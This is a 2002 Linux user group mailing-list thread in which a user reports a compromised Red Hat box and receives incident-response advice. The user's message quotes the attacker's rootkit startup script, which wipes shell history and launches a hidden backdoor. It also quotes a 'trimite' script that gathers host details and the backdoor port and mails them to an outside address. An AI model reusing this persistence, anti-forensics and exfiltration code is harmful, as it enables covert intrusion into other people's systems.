[lug] i got hacked

D. Stimits stimits at idcomm.com
Thu Apr 18 15:59:45 MDT 2002 

Searching google for linux plus trimite, there are an amazing number of
non-English links to .ro domain.

j davis wrote:
> 
> i have a box at a place i do contract work about 2 days a month.
> today i could not ssh to it. so iwent on site and discoverd i got
> hacked...like a dummy i didnt have tcp wrappers on or a firewall . i think
> they exploited wu-ftpd
> ..i use redhat 7.1 with wu-ftpd 2.6.1-20...i havent got around to upgrading
> yet.

An old sshd is vulnerable, so is wu-ftpd (very vulnerable). A big
difference in how it is approached would depend on whether those ports
need to be open to the whole world or not. Or if perhaps there are
limited numbers of public domains needing to be open. I see port scans
all day that are attempting one intrusion or another, DNS on port 53 or
lpd exploits on 515 are the other major sources of exploits. So if you
have BIND running, or an old lpd which is open to the world, those are
also high on the list.

> anyway here is what i found in /etc/rc3.d/S52remote
> 
> #!/bin/sh
> 
> rm -rf /root/.bash_history
> ln -s /dev/null /root/.bash_history
> 
> cd /dev
> ./ryz -f ./s
> /etc/rc.d/init.d/sshd stop
> cd /
> 
> /usr/bin/trimite
> 
> then here is /usr/bin/trimite
> 
> #!/bin/sh
> 
> echo "* Info : $(uname -a)" >> /tmp/info
> echo "* Hostname : $(hostname -f)" >> /tmp/info
> echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
> echo "* Uptime : $(uptime)" >> /tmp/info
> echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
> echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
> echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
> echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
> echo "* Spatiu Liber: $(df -h)" >> /tmp/info

Interesting, non-English like most of the web search URL's. I know .ru
is Russia, anyone know what domain .ro is?

> echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
> echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
> echo "* Portul rootkitului este 25897" >> /tmp/info

I am guessing this is the port used for backdoors, being sent to
yahoo.com.

> cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com

VERY VERY IMPORTANT: Send this to both abuse at yahoo.com and the FBI. You
probably can't prosecute, but it should be added to their database and
knowledge. Yahoo.com should be told very explicitly to keep log
information concerning that account in case authorities wish to see it,
a crime has been comitted.

> rm -f /tmp/info
> 
> so, netstat says i have something listening on 25897...what should i do?!
> never benn hacked before....i already turned off ftp and turned on tcp
> wrappers.

If it installed a stealth module you will not see it, nor if the netstat
and other net programs themselves were altered (very common). Probably
measures like tcp wrappers had a modified version in. You could, if rpm
based or you otherwise have MD5 checksums of files, use a rescue cd
(which means MD5 and rpm or other check utilities are not modified in
secret), search for an idea of what was altered to aid in your next
setup protecting against this again (very advisable). But in the end,
you probably need to save data, e.g., home directories, and wipe the
drive and reinstall from scratch, being certain to firewall where
possible (both incoming and outgoing, e.g., if you got cracked via lpd
on port 515, and nobody needs to print via a remote host somewhere else,
you can assume that a cracked box would result in your box becoming an
attacker of other port 515 boxes, so denying outbound targets to port
515 would block use of your machine to crack others). Oh, also make sure
linuxconf (see /etc/services) is blocked and/or disabled for network
based access.

If in doubt, you can ask about things you find suspicious for more
specific advice.

D. Stimits, stimits at idcomm.com

> 
> help please
> jd
> 
> _________________________________________________________________
> Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.
> 
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug

More information about the LUG mailing list